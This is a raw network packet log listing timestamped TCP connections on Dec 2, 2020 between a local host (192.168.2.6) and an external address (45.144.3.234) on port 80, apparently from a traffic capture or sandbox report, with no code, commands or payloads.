                                            Dec 2, 2020 11:53:56.676681995 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.729322910 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.729590893 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.737421036 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.789863110 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.790050983 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.842457056 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865797043 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865840912 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865983963 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.866134882 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.918432951 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.065783024 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.118191957 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.118424892 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.123188019 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.174937010 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.175045967 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.233601093 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270092964 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270200014 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270292044 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.270375967 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.323240042 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.460324049 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.512840033 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.513051987 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.538551092 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.592236042 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.592422962 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.644962072 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668447018 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668493032 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668622017 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.668788910 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.721627951 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.915693045 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.967835903 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.967994928 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.975991011 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.027992010 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.028104067 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.080158949 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112591982 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112637043 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112879038 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.112910032 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.166544914 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.300642014 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.353506088 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.353641033 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.357650042 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.410451889 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.410573959 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.463702917 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484031916 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484076977 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484255075 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.484299898 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.537326097 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.686249018 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.738763094 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.740519047 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.743469954 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.796668053 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.796829939 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.849829912 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873219013 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873261929 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873493910 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.873589039 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.925843954 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.109025955 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.161501884 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.161663055 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.169840097 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.226037025 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.226135969 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.283324957 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.308444023 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.308681965 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.309124947 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.309323072 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.361237049 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.538146973 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.590203047 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.590387106 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.598388910 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.652204990 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.652334929 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.704315901 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725656033 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725718021 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725790024 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.725827932 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.777947903 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.943234921 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.995922089 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.996124983 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.003773928 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.056993008 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.057231903 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.109816074 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.132744074 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.132788897 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.133021116 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.133083105 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.185823917 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.336672068 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.389077902 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.389225006 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.415813923 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.471774101 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.471972942 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.524545908 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545377016 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545455933 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545605898 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.545747042 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.598119020 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.743469954 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.796895981 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.797055006 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.838684082 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.717559099 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.717683077 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.721467972 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.773453951 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.773554087 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.826003075 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852649927 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852705002 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:14.852993011 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.853024960 CET4994680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:14.905347109 CET804994645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.073704958 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.126600027 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.126725912 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.132386923 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.185878992 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.187186003 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.239947081 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261504889 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261539936 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.261635065 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.261672020 CET4994780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.314454079 CET804994745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.488081932 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.540329933 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.540494919 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.547116041 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.599402905 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.599518061 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.652380943 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675228119 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675267935 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.675373077 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.676080942 CET4994880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.728513002 CET804994845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.849126101 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.917526960 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.917656898 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.920391083 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:15.973742008 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:15.978032112 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.030641079 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.055699110 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.055768013 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.056364059 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.056415081 CET4994980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.110754013 CET804994945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.297581911 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.352760077 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.352967024 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.357728004 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.409969091 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.410058975 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.461947918 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.485110998 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.485166073 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.485302925 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.485338926 CET4995080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.537136078 CET804995045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.663086891 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.717847109 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.718132973 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.721966982 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.774705887 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.774810076 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.829710960 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.854005098 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.854064941 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:16.854129076 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.854180098 CET4995380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:16.908086061 CET804995345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.100908995 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.152575016 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.152713060 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.155236959 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.206881046 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.207006931 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.261796951 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.282335043 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.282388926 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.282490015 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.282552958 CET4995480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.334220886 CET804995445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.454166889 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.507035971 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.507160902 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.509660959 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.562303066 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.562423944 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.615010977 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.634665966 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.634705067 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.634840012 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.635078907 CET4995580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.687643051 CET804995545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.875099897 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.928231001 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.928349018 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.931638002 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:17.984597921 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:17.984682083 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.037722111 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.084548950 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.084595919 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.084676981 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.084764004 CET4995680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.137567043 CET804995645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.264074087 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.316611052 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.316770077 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.320179939 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.373341084 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.373460054 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.426909924 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.450665951 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.450725079 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.450855017 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.450885057 CET4995780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.503309965 CET804995745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.731687069 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.784570932 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.784712076 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.788388968 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.840961933 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.841100931 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.893764019 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.917300940 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.917335987 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:18.917458057 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.917613983 CET4995880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:18.970429897 CET804995845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.180704117 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.233480930 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.233673096 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.241028070 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.293625116 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.293788910 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.349196911 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.373668909 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.373724937 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.373878002 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.374016047 CET4995980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.427011013 CET804995945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.568366051 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.621083975 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.621253967 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.628892899 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.682837963 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.683029890 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.735903978 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.758888006 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.758943081 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.759071112 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.759135008 CET4996080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:19.812436104 CET804996045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:19.955461979 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.007868052 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.008013964 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.012145042 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.064696074 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.064877987 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.117301941 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.137866020 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.137923002 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.138076067 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.138139963 CET4996180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.190491915 CET804996145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.413201094 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.466026068 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.466231108 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.474217892 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.526902914 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.527012110 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.579739094 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.612632036 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.612673998 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.612823963 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.612951994 CET4996280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.665664911 CET804996245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.803719997 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.862773895 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.862893105 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.865487099 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.919960976 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.920099020 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.972712994 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.993083000 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.993145943 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:20.993258953 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:20.993341923 CET4996380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.047183990 CET804996345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.195457935 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.246608019 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.246746063 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.251329899 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.302472115 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.302613020 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.354022026 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.376930952 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.376981020 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.377080917 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.377116919 CET4996480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.428313017 CET804996445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.555187941 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.609445095 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.609544992 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.612720013 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.665241957 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.665374041 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.717868090 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.738056898 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.738104105 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.738219976 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.738368034 CET4996580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.790714025 CET804996545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.935115099 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.987013102 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:21.987211943 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:21.993889093 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.045686007 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.045826912 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.099278927 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.123760939 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.123814106 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.124100924 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.124156952 CET4996680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.175877094 CET804996645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.341667891 CET4996780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.397527933 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.397721052 CET4996780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.405112982 CET4996780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:22.467843056 CET804996745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:22.467976093 CET4996780192.168.2.645.144.3.234
